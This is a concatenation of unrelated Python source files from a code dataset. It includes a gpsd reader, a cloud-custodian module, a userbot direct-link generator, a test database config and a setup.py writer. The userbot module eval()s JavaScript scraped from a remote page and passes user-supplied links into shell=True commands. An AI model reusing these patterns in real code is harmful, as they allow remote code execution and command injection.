        # no-op; the field that was meant to be updated appears to be
        # missing - confirm intent before relying on this method.
        imaje = cls.objects.filter(id=id).update(id=id)
        return imaje

    def __str__(self):
        return self.name
718455f4106f3178576e6216074bd1e1ffd6867a | 1,817 | py | Python | GPSController.py | alan412/GeekPi | 4333ac19efdd230ae2ff8367a3b6f23639250462 | [
"MIT"
] | null | null | null | GPSController.py | alan412/GeekPi | 4333ac19efdd230ae2ff8367a3b6f23639250462 | [
"MIT"
] | null | null | null | GPSController.py | alan412/GeekPi | 4333ac19efdd230ae2ff8367a3b6f23639250462 | [
"MIT"
] | null | null | null | from gps import *
import time
import threading
import math
class GpsController(threading.Thread):
    """Background thread that continuously drains the gpsd client buffer.

    gpsd only exposes the latest report, so ``run`` must keep calling
    ``next()``; consumers read the current state through the properties
    below. Stop the thread with ``stopController()`` then ``join()``.
    """

    def __init__(self):
        threading.Thread.__init__(self)
        self.gpsd = gps(mode=WATCH_ENABLE)  # starting the stream of info
        self.running = False

    def run(self):
        self.running = True
        while self.running:
            # grab EACH set of gpsd info to clear the buffer
            self.gpsd.next()

    def stopController(self):
        # Signal run() to fall out of its loop; callers should join()
        # the thread afterwards.
        self.running = False

    @property
    def fix(self):
        # Latest position fix reported by gpsd.
        return self.gpsd.fix

    @property
    def utc(self):
        # UTC timestamp of the latest gpsd report.
        return self.gpsd.utc

    @property
    def satellites(self):
        # Satellite information from the latest gpsd report.
        return self.gpsd.satellites
if __name__ == '__main__':
# create the controller
gpsc = GpsController()
try:
# start controller
gpsc.start()
while True:
print "latitude ", gpsc.fix.latitude
print "longitude ", gpsc.fix.longitude
print "time utc ", gpsc.utc, " + ", gpsc.fix.time
print "altitude (m)", gpsc.fix.altitude
print "eps ", gpsc.fix.eps
print "epx ", gpsc.fix.epx
print "epv ", gpsc.fix.epv
print "ept ", gpsc.gpsd.fix.ept
print "speed (m/s) ", gpsc.fix.speed
print "climb ", gpsc.fix.climb
print "track ", gpsc.fix.track
print "mode ", gpsc.fix.mode
print "sats ", gpsc.satellites
time.sleep(0.5)
#Ctrl C
except KeyboardInterrupt:
print "User cancelled"
#Error
except:
print "Unexpected error:", sys.exc_info()[0]
raise
finally:
print "Stopping gps controller"
gpsc.stopController()
#wait for the tread to finish
gpsc.join()
print "Done"
| 25.591549 | 71 | 0.564117 |
81377bb559733d6523d41806be02209655d5288b | 1,391 | py | Python | tools/c7n_gcp/c7n_gcp/entry.py | yuriydee/cloud-custodian | 172267dbf2d1cc18ce21994cc747cad12a62564b | [
"Apache-2.0"
] | null | null | null | tools/c7n_gcp/c7n_gcp/entry.py | yuriydee/cloud-custodian | 172267dbf2d1cc18ce21994cc747cad12a62564b | [
"Apache-2.0"
] | null | null | null | tools/c7n_gcp/c7n_gcp/entry.py | yuriydee/cloud-custodian | 172267dbf2d1cc18ce21994cc747cad12a62564b | [
"Apache-2.0"
] | null | null | null | # Copyright 2018 Capital One Services, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import c7n_gcp.policy
import c7n_gcp.resources.bigquery
import c7n_gcp.resources.build
import c7n_gcp.resources.compute
import c7n_gcp.resources.function
import c7n_gcp.resources.gke
import c7n_gcp.resources.iam
import c7n_gcp.resources.logging
import c7n_gcp.resources.network
import c7n_gcp.resources.pubsub
import c7n_gcp.resources.resourcemanager
import c7n_gcp.resources.service
import c7n_gcp.resources.source
import c7n_gcp.resources.storage
import c7n_gcp.resources.sql # noqa: F401
from c7n_gcp.provider import resources as gcp_resources
# Quiet the noisy discovery-cache messages emitted by the Google API client.
logging.getLogger('googleapiclient.discovery').setLevel(logging.WARNING)

# Let resource registry subscribers have a chance to look at full set of resources.
gcp_resources.notify(gcp_resources.EVENT_FINAL)
def initialize_gcp():
    """Provider initialization hook; all registration happens at import time."""
| 32.348837 | 83 | 0.813803 |
a369ba5bca09b2ade8917d332a0b9de4eee8de30 | 12,873 | py | Python | userbot/modules/direct_links.py | Rama-Fps/rama | e41db39a3db98a47f7aca1d404a7b1c87edfd8b4 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | userbot/modules/direct_links.py | Rama-Fps/rama | e41db39a3db98a47f7aca1d404a7b1c87edfd8b4 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | userbot/modules/direct_links.py | Rama-Fps/rama | e41db39a3db98a47f7aca1d404a7b1c87edfd8b4 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | # Copyright (C) 2019 The Raphielscape Company LLC.
#
# Licensed under the Raphielscape Public License, Version 1.c (the "License");
# you may not use this file except in compliance with the License.
#
""" Userbot module containing various sites direct links generators"""
from subprocess import PIPE, Popen
import re
import urllib.parse
import json
from random import choice
import requests
from bs4 import BeautifulSoup
from humanize import naturalsize
from userbot import CMD_HELP
from userbot.events import register
def subprocess_run(cmd):
    """Run *cmd* through the shell and capture its output.

    Returns the ``(stdout, stderr)`` tuple on success, or a
    markdown-formatted error string when the command exits non-zero.
    """
    process = Popen(cmd, stdout=PIPE, stderr=PIPE,
                    shell=True, universal_newlines=True)
    captured = process.communicate()
    status = process.returncode
    if status == 0:
        return captured
    # Non-zero exit: report code, stdout and stderr in a code block.
    return ('```An error was detected while running the subprocess:\n'
            f'exit code: {status}\n'
            f'stdout: {captured[0]}\n'
            f'stderr: {captured[1]}```')
@register(outgoing=True, pattern=r"^.dir(?: |$)([\s\S]*)")
async def direct_link_generator(request):
    """Generate direct-download links for every URL in the command/reply.

    The URL(s) come either from the command argument or, failing that,
    from the replied-to message. Each supported host is delegated to its
    dedicated generator; unsupported hosts are reported as such.
    """
    await request.edit("`Processing...`")
    textx = await request.get_reply_message()
    message = request.pattern_match.group(1)
    if message:
        pass
    elif textx:
        message = textx.text
    else:
        await request.edit("`Usage: .direct <url>`")
        return
    reply = ''
    links = re.findall(r'\bhttps?://.*\.\S+', message)
    if not links:
        # Nothing to do: report and stop instead of falling through to a
        # second, redundant edit after the (empty) loop below.
        await request.edit("`No links found!`")
        return
    for link in links:
        if 'drive.google.com' in link:
            reply += gdrive(link)
        elif 'zippyshare.com' in link:
            reply += zippy_share(link)
        elif 'mega.' in link:
            reply += mega_dl(link)
        elif 'yadi.sk' in link:
            reply += yandex_disk(link)
        elif 'cloud.mail.ru' in link:
            reply += cm_ru(link)
        elif 'mediafire.com' in link:
            reply += mediafire(link)
        elif 'sourceforge.net' in link:
            reply += sourceforge(link)
        elif 'osdn.net' in link:
            reply += osdn(link)
        elif 'github.com' in link:
            reply += github(link)
        else:
            # BUG FIX: the original concatenated the hostname directly
            # onto "is not supported" without a separating space.
            reply += re.findall(r"\bhttps?://(.*?[^/]+)",
                                link)[0] + ' is not supported'
    await request.edit(reply)
def gdrive(url: str) -> str:
    """GDrive direct links generator.

    Returns a markdown link to the direct download, or an error message.
    """
    # Base host, used both to build the export URL and the warning-page
    # download link below.
    drive = 'https://drive.google.com'
    try:
        link = re.findall(r'\bhttps?://drive\.google\.com\S+', url)[0]
    except IndexError:
        reply = "`No Google drive links found`\n"
        return reply
    file_id = ''
    reply = ''
    # The file id can be embedded in three different URL shapes.
    if link.find("view") != -1:
        file_id = link.split('/')[-2]
    elif link.find("open?id=") != -1:
        file_id = link.split("open?id=")[1].strip()
    elif link.find("uc?id=") != -1:
        file_id = link.split("uc?id=")[1].strip()
    url = f'{drive}/uc?export=download&id={file_id}'
    download = requests.get(url, stream=True, allow_redirects=False)
    cookies = download.cookies
    try:
        # In case of small file size, Google downloads directly and the
        # target shows up in the Location header.
        dl_url = download.headers["location"]
        if 'accounts.google.com' in dl_url:  # non-public file
            reply += '`Link is not public!`\n'
            return reply
        name = 'Direct Download Link'
    except KeyError:
        # In case of a download warning page: scrape the confirm link and
        # the file name, then follow it with the same session cookies.
        page = BeautifulSoup(download.content, 'lxml')
        export = drive + page.find('a', {'id': 'uc-download-link'}).get('href')
        name = page.find('span', {'class': 'uc-name-size'}).text
        response = requests.get(export,
                                stream=True,
                                allow_redirects=False,
                                cookies=cookies)
        dl_url = response.headers['location']
        if 'accounts.google.com' in dl_url:
            reply += 'Link is not public!'
            return reply
    reply += f'[{name}]({dl_url})\n'
    return reply
def zippy_share(url: str) -> str:
    """ZippyShare direct links generator.

    Based on https://github.com/LameLemon/ziggy
    """
    reply = ''
    dl_url = ''
    try:
        link = re.findall(r'\bhttps?://.*zippyshare\.com\S+', url)[0]
    except IndexError:
        reply = "`No ZippyShare links found`\n"
        return reply
    session = requests.Session()
    base_url = re.search('http.+.com', link).group()
    response = session.get(link)
    page_soup = BeautifulSoup(response.content, "lxml")
    scripts = page_soup.find_all("script", {"type": "text/javascript"})
    # The page hides the real link behind a small JavaScript arithmetic
    # expression; find the script that computes the dlbutton href.
    for script in scripts:
        if "getElementById('dlbutton')" in script.text:
            url_raw = re.search(r'= (?P<url>\".+\" \+ (?P<math>\(.+\)) .+);',
                                script.text).group('url')
            math = re.search(r'= (?P<url>\".+\" \+ (?P<math>\(.+\)) .+);',
                             script.text).group('math')
            # HACK/SECURITY: eval()s the arithmetic snippet scraped from
            # the remote page - untrusted input executed locally.
            dl_url = url_raw.replace(math, '"' + str(eval(math)) + '"')
            break
    # Second eval joins the quoted URL fragments into one string.
    dl_url = base_url + eval(dl_url)
    name = urllib.parse.unquote(dl_url.split('/')[-1])
    reply += f'[{name}]({dl_url})\n'
    return reply
def yandex_disk(url: str) -> str:
    """Yandex.Disk direct links generator.

    Based on https://github.com/wldhx/yadisk-direct
    """
    matches = re.findall(r'\bhttps?://.*yadi\.sk\S+', url)
    if not matches:
        return "`No Yandex.Disk links found`\n"
    api = ('https://cloud-api.yandex.net/v1/disk/public/resources/'
           'download?public_key={}')
    try:
        dl_url = requests.get(api.format(matches[0])).json()['href']
    except KeyError:
        # The API omits 'href' for missing files or exhausted quotas.
        return '`Error: File not found / Download limit reached`\n'
    name = dl_url.split('filename=')[1].split('&disposition')[0]
    return f'[{name}]({dl_url})\n'
def mega_dl(url: str) -> str:
    """MEGA.nz direct links generator.

    Using https://github.com/tonikelope/megadown
    """
    reply = ''
    try:
        link = re.findall(r'\bhttps?://.*mega.*\.nz\S+', url)[0]
    except IndexError:
        reply = "`No MEGA.nz links found`\n"
        return reply
    # Delegate to the bundled megadown helper script; -q = quiet,
    # -m = metadata-only (JSON on stdout).
    cmd = f'bin/megadown -q -m {link}'
    result = subprocess_run(cmd)
    try:
        # subprocess_run returns (stdout, stderr) on success or an error
        # string on failure; json.loads of the latter's first character
        # raises JSONDecodeError, which is handled below.
        data = json.loads(result[0])
    except json.JSONDecodeError:
        reply += "`Error: Can't extract the link`\n"
        return reply
    except IndexError:
        return reply
    dl_url = data['url']
    name = data['file_name']
    size = naturalsize(int(data['file_size']))
    reply += f'[{name} ({size})]({dl_url})\n'
    return reply
def cm_ru(url: str) -> str:
    """cloud.mail.ru direct links generator.

    Using https://github.com/JrMasterModelBuilder/cmrudl.py
    """
    reply = ''
    try:
        link = re.findall(r'\bhttps?://.*cloud\.mail\.ru\S+', url)[0]
    except IndexError:
        reply = "`No cloud.mail.ru links found`\n"
        return reply
    # Delegate to the bundled cmrudl helper; -s prints status as JSON.
    cmd = f'bin/cmrudl -s {link}'
    result = subprocess_run(cmd)
    try:
        # The JSON payload is on the last stdout line; subprocess_run
        # returns an error string (not a tuple) on failure, in which case
        # the parse below fails and is reported.
        result = result[0].splitlines()[-1]
        data = json.loads(result)
    except json.decoder.JSONDecodeError:
        reply += "`Error: Can't extract the link`\n"
        return reply
    except IndexError:
        return reply
    dl_url = data['download']
    name = data['file_name']
    size = naturalsize(int(data['file_size']))
    reply += f'[{name} ({size})]({dl_url})\n'
    return reply
def mediafire(url: str) -> str:
    """MediaFire direct links generator."""
    found = re.findall(r'\bhttps?://.*mediafire\.com\S+', url)
    if not found:
        return "`No MediaFire links found`\n"
    page = BeautifulSoup(requests.get(found[0]).content, 'lxml')
    # The download anchor carries the direct URL and the "(size)" text.
    anchor = page.find('a', {'aria-label': 'Download file'})
    dl_url = anchor.get('href')
    size = re.findall(r'\(.*\)', anchor.text)[0]
    name = page.find('div', {'class': 'filename'}).text
    return f'[{name} {size}]({dl_url})\n'
def sourceforge(url: str) -> str:
    """SourceForge direct links generator.

    Returns a markdown list of per-mirror direct download links.
    """
    try:
        link = re.findall(r'\bhttps?://.*sourceforge\.net\S+', url)[0]
    except IndexError:
        reply = "`No SourceForge links found`\n"
        return reply
    # Path of the file inside the project's files/ tree.
    file_path = re.findall(r'files(.*)/download', link)[0]
    reply = f"Mirrors for __{file_path.split('/')[-1]}__\n"
    project = re.findall(r'projects?/(.*?)/files', link)[0]
    mirrors = f'https://sourceforge.net/settings/mirror_choices?' \
        f'projectname={project}&filename={file_path}'
    page = BeautifulSoup(requests.get(mirrors).content, 'html.parser')
    info = page.find('ul', {'id': 'mirrorList'}).findAll('li')
    # Skip the first <li>, which is not a mirror entry.
    for mirror in info[1:]:
        name = re.findall(r'\((.*)\)', mirror.text.strip())[0]
        dl_url = f'https://{mirror["id"]}.dl.sourceforge.net/project/{project}/{file_path}'
        reply += f'[{name}]({dl_url}) '
    return reply
def osdn(url: str) -> str:
    """OSDN direct links generator.

    Returns a markdown list of per-mirror direct download links.
    """
    osdn_link = 'https://osdn.net'
    try:
        link = re.findall(r'\bhttps?://.*osdn\.net\S+', url)[0]
    except IndexError:
        reply = "`No OSDN links found`\n"
        return reply
    page = BeautifulSoup(
        requests.get(link, allow_redirects=True).content, 'lxml')
    info = page.find('a', {'class': 'mirror_link'})
    link = urllib.parse.unquote(osdn_link + info['href'])
    reply = f"Mirrors for __{link.split('/')[-1]}__\n"
    mirrors = page.find('form', {'id': 'mirror-select-form'}).findAll('tr')
    # Skip the first <tr>, which is the table header.
    for data in mirrors[1:]:
        mirror = data.find('input')['value']
        name = re.findall(r'\((.*)\)', data.findAll('td')[-1].text.strip())[0]
        # Swap the mirror id into the m= query parameter of the link.
        dl_url = re.sub(r'm=(.*)&f', f'm={mirror}&f', link)
        reply += f'[{name}]({dl_url}) '
    return reply
def github(url: str) -> str:
    """GitHub Releases direct links generator.

    Resolves the redirect behind a release-asset URL and returns a
    markdown link to the final download location.
    """
    try:
        link = re.findall(r'\bhttps?://.*github\.com.*releases\S+', url)[0]
    except IndexError:
        return "`No GitHub Releases links found`\n"
    # BUG FIX: fetch the *extracted* release link rather than the raw
    # input, and do not follow the redirect so the target shows up in
    # the Location header.
    download = requests.get(link, stream=True, allow_redirects=False)
    try:
        dl_url = download.headers["location"]
    except KeyError:
        # BUG FIX: the original fell through here and still appended a
        # markdown link with an empty URL after the error message.
        return "`Error: Can't extract the link`\n"
    name = link.split('/')[-1]
    return f'[{name}]({dl_url}) '
def androidfilehost(url: str) -> str:
    """AFH (AndroidFileHost) direct links generator.

    Returns a markdown list of per-mirror download links.
    """
    try:
        link = re.findall(r'\bhttps?://.*androidfilehost.*fid.*\S+', url)[0]
    except IndexError:
        reply = "`No AFH links found`\n"
        return reply
    fid = re.findall(r'\?fid=(.*)', link)[0]
    session = requests.Session()
    user_agent = useragent()
    headers = {'user-agent': user_agent}
    # Initial GET establishes the session cookies needed by the XHR below.
    res = session.get(link, headers=headers, allow_redirects=True)
    # Mimic the browser's XHR request that the site issues for mirrors.
    headers = {
        'origin': 'https://androidfilehost.com',
        'accept-encoding': 'gzip, deflate, br',
        'accept-language': 'en-US,en;q=0.9',
        'user-agent': user_agent,
        'content-type': 'application/x-www-form-urlencoded; charset=UTF-8',
        'x-mod-sbb-ctype': 'xhr',
        'accept': '*/*',
        'referer': f'https://androidfilehost.com/?fid={fid}',
        'authority': 'androidfilehost.com',
        'x-requested-with': 'XMLHttpRequest',
    }
    data = {
        'submit': 'submit',
        'action': 'getdownloadmirrors',
        'fid': f'{fid}'
    }
    mirrors = None
    reply = ''
    error = "`Error: Can't find Mirrors for the link`\n"
    try:
        req = session.post(
            'https://androidfilehost.com/libs/otf/mirrors.otf.php',
            headers=headers,
            data=data,
            cookies=res.cookies)
        mirrors = req.json()['MIRRORS']
    except (json.decoder.JSONDecodeError, TypeError):
        reply += error
    # NOTE(review): when the except branch above fires, ``mirrors`` stays
    # None and the error message is appended a second time here.
    if not mirrors:
        reply += error
        return reply
    for item in mirrors:
        name = item['name']
        dl_url = item['url']
        reply += f'[{name}]({dl_url}) '
    return reply
def useragent():
    """Return a random Android user-agent string scraped from the web."""
    source_url = ('https://developers.whatismybrowser.com/'
                  'useragents/explore/operating_system_name/android/')
    soup = BeautifulSoup(requests.get(source_url).content, 'lxml')
    cells = soup.findAll('td', {'class': 'useragent'})
    return choice(cells).text
# Register the in-chat help entry for the .dir command.
CMD_HELP.update({
    "direct":
    ">`.dir <url>`"
    "\nUsage: Reply to a link or paste a URL to\n"
    "generate a direct download link\n\n"
    "List of supported URLs:\n"
    "`Google Drive - MEGA.nz - Cloud Mail - Yandex.Disk - AFH - "
    "ZippyShare - MediaFire - SourceForge - OSDN - GitHub`"
})
| 34.236702 | 91 | 0.574225 |
732ad0dfe6e7089832beb01c637675ca162227f6 | 2,231 | py | Python | graphql_compiler/tests/integration_tests/integration_backend_config.py | justinaustin/graphql-compiler | 4e68d592fc97855ca043dc20bdf59be4298647ab | [
"Apache-2.0"
] | null | null | null | graphql_compiler/tests/integration_tests/integration_backend_config.py | justinaustin/graphql-compiler | 4e68d592fc97855ca043dc20bdf59be4298647ab | [
"Apache-2.0"
] | null | null | null | graphql_compiler/tests/integration_tests/integration_backend_config.py | justinaustin/graphql-compiler | 4e68d592fc97855ca043dc20bdf59be4298647ab | [
"Apache-2.0"
] | null | null | null | # Copyright 2018-present Kensho Technologies, LLC.
from collections import namedtuple
from six.moves.urllib.parse import quote_plus
from .. import test_backend
# Root password shared by the dockerized integration-test databases.
DEFAULT_ROOT_PASSWORD = "root"  # nosec

# All SQL backends the integration tests know how to talk to.
SQL_BACKENDS = {
    test_backend.POSTGRES,
    test_backend.MYSQL,
    test_backend.MARIADB,
    test_backend.MSSQL,
    test_backend.SQLITE,
}

# sqlite does not require that a DB be created/dropped for testing
EXPLICIT_DB_BACKENDS = {
    test_backend.POSTGRES,
    test_backend.MYSQL,
    test_backend.MARIADB,
    test_backend.MSSQL,
}

# Backends queried through the MATCH query language.
MATCH_BACKENDS = {
    test_backend.ORIENTDB,
}

# Split Neo4j and RedisGraph because RedisGraph doesn't support all Neo4j features.
NEO4J_BACKENDS = {
    test_backend.NEO4J,
}

REDISGRAPH_BACKENDS = {
    test_backend.REDISGRAPH,
}

pyodbc_parameter_string = "DRIVER={driver};SERVER={server};UID={uid};PWD={pwd}".format(  # nosec
    driver="{ODBC Driver 17 for SQL SERVER}",
    server="127.0.0.1,1434",  # Do not change to 'localhost'.
    # You won't be able to connect with the db.
    uid="SA",  # System Administrator.
    pwd="Root-secure1",
)

# delimiters must be URL escaped
escaped_pyodbc_parameter_string = quote_plus(pyodbc_parameter_string)

SQL_BACKEND_TO_CONNECTION_STRING = {
    # HACK(bojanserafimov): Entries are commented-out because MSSQL is the only one whose scheme
    #                       initialization is properly configured, with a hierarchy of multiple
    #                       databases and schemas. I'm keeping the code to remember the connection
    #                       string formats.
    #
    test_backend.POSTGRES: "postgresql://postgres:{password}@localhost:5433".format(
        password=DEFAULT_ROOT_PASSWORD
    ),
    # test_backend.MYSQL:
    #     'mysql://root:{password}@127.0.0.1:3307'.format(password=DEFAULT_ROOT_PASSWORD),
    # test_backend.MARIADB:
    #     'mysql://root:{password}@127.0.0.1:3308'.format(password=DEFAULT_ROOT_PASSWORD),
    test_backend.MSSQL: "mssql+pyodbc:///?odbc_connect={}".format(escaped_pyodbc_parameter_string),
    # test_backend.SQLITE:
    #     'sqlite:///:memory:',
}

# Per-backend handle: SQLAlchemy engine plus its base connection string.
SqlTestBackend = namedtuple(
    "SqlTestBackend",
    (
        "engine",
        "base_connection_string",
    ),
)
| 29.355263 | 99 | 0.693411 |
11f8904b17b36bb939353a0df4d4c5030aa09952 | 13,685 | py | Python | l2tdevtools/dependency_writers/setup.py | log2timeline/l2tdevtools | 6f328a0fe72f243ff6e454397ea405c65bae9424 | [
"Apache-2.0"
] | 6 | 2015-08-07T12:53:10.000Z | 2022-02-18T02:59:51.000Z | l2tdevtools/dependency_writers/setup.py | joachimmetz/l2tdevtools | 45048601cebfc73d1f35c5dcdd8e913769ca660f | [
"Apache-2.0"
] | 700 | 2015-02-23T06:55:06.000Z | 2022-03-12T16:43:50.000Z | l2tdevtools/dependency_writers/setup.py | joachimmetz/l2tdevtools | 45048601cebfc73d1f35c5dcdd8e913769ca660f | [
"Apache-2.0"
] | 21 | 2015-03-28T10:29:23.000Z | 2021-08-12T04:56:18.000Z | # -*- coding: utf-8 -*-
"""Writer for setup configuration and script files."""
import glob
import io
import os
import textwrap
from l2tdevtools.dependency_writers import interface
class SetupCfgWriter(interface.DependencyFileWriter):
  """Setup configuration file writer."""

  # Path of the file this writer generates.
  PATH = 'setup.cfg'

  # Documentation files referenced from the generated configuration.
  _DOC_FILES = ('ACKNOWLEDGEMENTS', 'AUTHORS', 'LICENSE', 'README')

  # Projects whose source distribution includes test data.
  _PROJECTS_WITH_SDIST_TEST_DATA = (
      'dfvfs', 'dfwinreg', 'plaso')

  _TEMPLATE_DIRECTORY = os.path.join('data', 'templates', 'setup.cfg')

  def _GenerateFromTemplate(self, template_filename, template_mappings):
    """Generates file context based on a template file.

    Args:
      template_filename (str): path of the template file.
      template_mappings (dict[str, str]): template mappings, where the key
          maps to the name of a template variable.

    Returns:
      str: output based on the template string.

    Raises:
      RuntimeError: if the template cannot be formatted.
    """
    # Resolve the template name relative to the l2tdevtools checkout
    # before delegating to the base class.
    template_filename = os.path.join(
        self._l2tdevtools_path, self._TEMPLATE_DIRECTORY, template_filename)
    return super(SetupCfgWriter, self)._GenerateFromTemplate(
        template_filename, template_mappings)

  def Write(self):
    """Writes a setup.cfg file."""
    # Only reference documentation files that actually exist on disk.
    doc_files = [
        doc_file for doc_file in self._DOC_FILES if os.path.isfile(doc_file)]

    # Format the doc_files key as a multi-line setup.cfg value.
    formatted_doc_files = []
    for index, doc_file in enumerate(sorted(doc_files)):
      if index == 0:
        line = 'doc_files = {0:s}'.format(doc_file)
      else:
        line = ' {0:s}'.format(doc_file)
      formatted_doc_files.append(line)

    # Format the RPM requires key the same way.
    python3_dependencies = self._dependency_helper.GetRPMRequires()

    formatted_requires = []
    for index, dependency in enumerate(python3_dependencies):
      if index == 0:
        line = 'requires = {0:s}'.format(dependency)
      else:
        line = ' {0:s}'.format(dependency)
      formatted_requires.append(line)

    formatted_requires.append('')

    template_mappings = {
        'doc_files': '\n'.join(formatted_doc_files),
        'maintainer': self._project_definition.maintainer,
        'requires': '\n'.join(formatted_requires)}

    # Assemble the file from the template sections in order.
    file_content = []

    template_data = self._GenerateFromTemplate('metadata', template_mappings)
    file_content.append(template_data)

    if self._project_definition.name in self._PROJECTS_WITH_SDIST_TEST_DATA:
      template_data = self._GenerateFromTemplate(
          'sdist_test_data', template_mappings)
      file_content.append(template_data)

    template_data = self._GenerateFromTemplate('bdist_rpm', template_mappings)
    file_content.append(template_data)

    template_data = self._GenerateFromTemplate('bdist_wheel', template_mappings)
    file_content.append(template_data)

    file_content = ''.join(file_content)

    with io.open(self.PATH, 'w', encoding='utf-8') as file_object:
      file_object.write(file_content)
class SetupPyWriter(interface.DependencyFileWriter):
  """Setup script file writer."""

  # Path of the file this writer generates.
  PATH = os.path.join('setup.py')

  # Documentation files referenced from the generated setup script.
  _DOC_FILES = ('ACKNOWLEDGEMENTS', 'AUTHORS', 'LICENSE', 'README')

  # Projects that ship *.yaml package data next to their modules.
  _PROJECTS_WITH_PACKAGE_DATA = (
      'dfvfs', 'dfwinreg', 'dtformats', 'plaso', 'winregrc')

  # Projects whose generated script uses a python3 shebang.
  _PROJECTS_WITH_PYTHON3_AS_DEFAULT = ('plaso', )

  # Projects whose source distribution includes test data.
  _PROJECTS_WITH_SDIST_TEST_DATA = (
      'dfvfs', 'dfwinreg', 'plaso')

  _TEMPLATE_DIRECTORY = os.path.join('data', 'templates', 'setup.py')
def _DetermineSubmoduleLevels(self, project_name):
"""Determines the number of submodule levels.
Args:
project_name (str): name of the project.
Return:
int: number of submodule levels.
"""
submodule_glob = project_name
submodule_levels = 0
while submodule_levels < 10:
submodule_glob = '{0:s}/*'.format(submodule_glob)
submodule_paths = [
path for path in glob.glob(submodule_glob)
if os.path.isdir(path) and os.path.basename(path) != '__pycache__']
if not submodule_paths:
break
submodule_levels += 1
return submodule_levels
  def _GenerateFromTemplate(self, template_filename, template_mappings):
    """Generates file context based on a template file.

    Args:
      template_filename (str): path of the template file.
      template_mappings (dict[str, str]): template mappings, where the key
          maps to the name of a template variable.

    Returns:
      str: output based on the template string.

    Raises:
      RuntimeError: if the template cannot be formatted.
    """
    # Resolve the template name relative to the l2tdevtools checkout
    # before delegating to the base class.
    template_filename = os.path.join(
        self._l2tdevtools_path, self._TEMPLATE_DIRECTORY, template_filename)
    return super(SetupPyWriter, self)._GenerateFromTemplate(
        template_filename, template_mappings)
  def Write(self):
    """Writes a setup.py file."""
    # Width is 80 characters minus 4 spaces, 2 single quotes and 1 comma.
    text_wrapper = textwrap.TextWrapper(drop_whitespace=False, width=73)

    # Wrap and quote the short/long descriptions for embedding into the
    # generated setup.py source.
    description_short = text_wrapper.wrap(
        self._project_definition.description_short)
    description_short = '\n'.join([
        ' \'{0:s}\''.format(line) for line in description_short])

    description_long = text_wrapper.wrap(
        self._project_definition.description_long)
    description_long = '\n'.join([
        ' \'{0:s}\''.format(line) for line in description_long])

    if self._project_definition.name in self._PROJECTS_WITH_PYTHON3_AS_DEFAULT:
      shebang = '#!/usr/bin/env python3'
    else:
      shebang = '#!/usr/bin/env python'

    if self._project_definition.name in ('artifacts', 'plaso'):
      data_files_path = 'share/{0:s}'.format(self._project_definition.name)
    else:
      data_files_path = 'share/{0:s}/data'.format(self._project_definition.name)

    # Only reference documentation files that actually exist on disk.
    doc_files = [
        doc_file for doc_file in self._DOC_FILES if os.path.isfile(doc_file)]

    # Split "Name <email>" into its two components.
    maintainer = self._project_definition.maintainer
    maintainer, _, maintainer_email = maintainer.rpartition('<')
    maintainer_email, _, _ = maintainer_email.rpartition('>')

    # Map the project status onto a PyPI trove classifier.
    if self._project_definition.status == 'experimental':
      development_status = 'Development Status :: 2 - Pre-Alpha'
    elif self._project_definition.status == 'alpha':
      development_status = 'Development Status :: 3 - Alpha'
    elif self._project_definition.status == 'beta':
      development_status = 'Development Status :: 4 - Beta'
    elif self._project_definition.status == 'stable':
      development_status = 'Development Status :: 5 - Production/Stable'
    else:
      development_status = ''

    # Directories excluded from find_packages() in the generated file.
    packages_exclude = ['tests', 'tests.*', 'utils']

    if os.path.isdir('docs'):
      packages_exclude.append('docs')

    data_directory = None
    if os.path.isdir('data'):
      data_directory = 'data'

    scripts_directory = None
    if os.path.isdir('scripts'):
      scripts_directory = 'scripts'
    elif os.path.isdir('tools'):
      scripts_directory = 'tools'

    if scripts_directory:
      packages_exclude.append(scripts_directory)

    packages_exclude = ', '.join([
        '\'{0:s}\''.format(exclude) for exclude in sorted(packages_exclude)])

    submodule_levels = self._DetermineSubmoduleLevels(
        self._project_definition.name)

    # Build the RPM %files listing for the python3 package; the doubled
    # braces survive the later str.format() call as %{python3_sitelib}.
    python3_package_module_prefix = '%{{{{python3_sitelib}}}}/{0:s}'.format(
        self._project_definition.name)

    python3_package_files = [
        '{0:s}/*.py'.format(python3_package_module_prefix)]

    # Slicing off the RPM macro prefix yields the on-disk path to probe
    # for *.yaml package data.
    yaml_glob = os.path.join(python3_package_module_prefix[21:], '*.yaml')
    if glob.glob(yaml_glob):
      python3_package_files.append(
          '{0:s}/*.yaml'.format(python3_package_module_prefix))

    # One wildcard level per detected submodule level.
    for _ in range(submodule_levels):
      python3_package_module_prefix = '{0:s}/*'.format(
          python3_package_module_prefix)

      python3_package_files.append(
          '{0:s}/*.py'.format(python3_package_module_prefix))

      yaml_glob = os.path.join(python3_package_module_prefix[21:], '*.yaml')
      if glob.glob(yaml_glob):
        python3_package_files.append(
            '{0:s}/*.yaml'.format(python3_package_module_prefix))

    python3_package_files.extend([
        '%{{python3_sitelib}}/{0:s}*.egg-info/*',
        '',
        '%exclude %{{_prefix}}/share/doc/*'])

    # Second pass: exclude __pycache__ directories at every level.
    python3_package_module_prefix = '%{{{{python3_sitelib}}}}/{0:s}'.format(
        self._project_definition.name)

    python3_package_files.append(
        '%exclude {0:s}/__pycache__/*'.format(python3_package_module_prefix))

    for _ in range(submodule_levels):
      python3_package_module_prefix = '{0:s}/*'.format(
          python3_package_module_prefix)
      python3_package_files.append(
          '%exclude {0:s}/__pycache__/*'.format(python3_package_module_prefix))

    if not data_directory and scripts_directory:
      python3_package_files.append('%exclude %{{_bindir}}/*.py')

    python3_package_files = ',\n'.join([
        ' \'{0:s}\''.format(package_file)
        for package_file in python3_package_files])
    python3_package_files = python3_package_files.format(
        self._project_definition.name)

    rpm_doc_files = [
        doc_file for doc_file in doc_files if doc_file != 'LICENSE']
    rpm_license_file = 'LICENSE'

    template_mappings = {
        'data_files_path': data_files_path,
        'doc_files': ', '.join([
            '\'{0:s}\''.format(doc_file) for doc_file in doc_files]),
        'description_long': description_long,
        'description_short': description_short,
        'development_status': development_status,
        'homepage_url': self._project_definition.homepage_url,
        'maintainer': maintainer.strip(),
        'maintainer_email': maintainer_email.strip(),
